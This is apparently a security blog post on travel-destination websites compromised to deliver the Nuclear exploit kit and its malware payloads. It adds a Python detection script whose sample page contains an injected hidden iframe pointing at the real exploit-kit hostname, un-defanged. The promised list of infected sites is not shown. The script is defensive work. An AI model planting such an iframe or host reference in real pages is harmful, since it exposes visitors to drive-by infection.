Proofpoint security researchers recently were the first to discover that a large number of travel destination websites had been compromised and were being used to deliver the Nuclear exploit kit.
The infected sites were detected by Proofpoint's Targeted Attack Protection after users received promotional emails from these sites containing links to infected pages. These were legitimate marketing emails that users had typically opted in to receive, so recipients had every reason to trust the links. That makes this a likely highly effective campaign, and one that shares many of the attributes usually associated with watering hole attacks: trusted, legitimate sites turned against their own visitors.
Some of the promotional emails included references to 4th of July activities while others carried general travel-related content, so the attackers timed the campaign to coincide with the summer travel season and the marketing activity that usually happens at this time of year.
Initially about a dozen travel destination websites were identified as compromised, and additional sites continue to be discovered. What is particularly worrisome is that these are popular sites that see a lot of organic web traffic, so anyone searching for tourism information on a large number of US cities could have been exposed to the infected pages.
For example, the Myrtle Beach website (www[.]visitmyrtlebeach[.]com) is the #2 search result on Google for “myrtle beach” and has an Alexa ranking of 79,296.
When a user browsed to any of these websites, they were exposed to the Nuclear exploit kit, which bundles multiple exploits, including ones for Java and Adobe Acrobat. In this case, if an exploit succeeds, it attempts to install at least three pieces of malware:
Zemot – A downloader that fetches and installs additional pieces of malware.
Rovnix – A sophisticated bootkit (a rootkit that loads from the boot sector) that launches the installed malware when the PC boots and then hides itself and the other malware from detection.
Fareit – Another downloader, which also attempts to steal user credentials and can be used in DDoS attacks.
This attack was also clever about its choice of hostname for the site hosting the exploit kit. In this case they used what appears to be a travel related site, ecom[.]virtualtravelevent[.]org, helping make the exploit link blend in and look like legitimate content.
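The exposure described above starts with an injected reference on a compromised page to the exploit-kit host, and the hostname was chosen to look like ordinary travel content. The check below, written as an added example for this post rather than Proofpoint's own tooling, parses a page's HTML, lists every remote resource it loads or redirects to, and flags any whose host matches the indicator from this post. The sample page, its site hostname (www.example-city-tourism.com) and the URL path under the exploit-kit host are all constructed for the example; only the hostname ecom[.]virtualtravelevent[.]org comes from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicator from the post, written defanged exactly as the post writes it.
DEFANGED_IOCS = ["ecom[.]virtualtravelevent[.]org"]


def refang(indicator):
    """Turn a defanged indicator such as 'ecom[.]example[.]org' back into a hostname."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip().lower()


IOC_HOSTS = {refang(i) for i in DEFANGED_IOCS}


class ResourceExtractor(HTMLParser):
    """Collects the URLs of tags that load remote content or redirect the browser."""

    # tag -> attribute that carries the remote URL
    LOAD_TAGS = {"iframe": "src", "script": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "meta":
            # <meta http-equiv="refresh" content="0;url=http://..."> is a redirect
            if attrs.get("http-equiv", "").lower() == "refresh":
                m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", attrs.get("content", ""), re.I)
                if m:
                    self.urls.append(m.group(1).strip())
            return
        attr = self.LOAD_TAGS.get(tag)
        if attr and attrs.get(attr):
            self.urls.append(attrs[attr].strip())


def external_loads(html, site_host):
    """Return (host, url) pairs for every resource loaded from a host other than the site's own.

    Relative URLs (no host) are same-origin and skipped; scheme-relative '//host/...'
    URLs are handled by urlsplit, and hostname comparison ignores case and port.
    """
    parser = ResourceExtractor()
    parser.feed(html)
    site_host = site_host.lower()
    hits = []
    for url in parser.urls:
        host = urlsplit(url).hostname
        if host and host.lower() != site_host:
            hits.append((host.lower(), url))
    return hits


def ioc_hits(html, site_host):
    """Subset of external_loads whose host matches a known exploit-kit indicator."""
    return [(h, u) for h, u in external_loads(html, site_host) if h in IOC_HOSTS]


# Constructed sample page: one same-origin script, one CDN script, and an injected
# iframe pointing at the exploit-kit host named in the post (path is made up).
SAMPLE_SITE_HOST = "www.example-city-tourism.com"
SAMPLE_PAGE = """<html><head><title>Summer events</title>
<script src="/js/site.js"></script>
<script src="https://cdn.example-cdn.net/jquery.min.js"></script>
</head><body>
<h1>Plan your July 4th visit</h1>
<iframe src="http://ecom.virtualtravelevent.org/events/july4.php" width="1" height="1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for host, url in external_loads(SAMPLE_PAGE, SAMPLE_SITE_HOST):
        flag = "IOC MATCH" if host in IOC_HOSTS else "review"
        print(f"{flag:9} {host:35} {url}")
```

Listing every off-site load, not just IOC matches, is deliberate: the same injected tag pointed at a hostname not yet on anyone's indicator list looks identical, and a travel-themed hostname is exactly what an analyst skimming the list is meant to overlook, so the lookalike name should be judged by where the site's legitimate assets actually live rather than by how plausible it sounds.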
So far, all of the IP addresses used in the attack appear to be based in Ukraine.
Current list of infected websites:
The hosting companies for these sites have been contacted, so some of the sites listed may since have been cleaned up.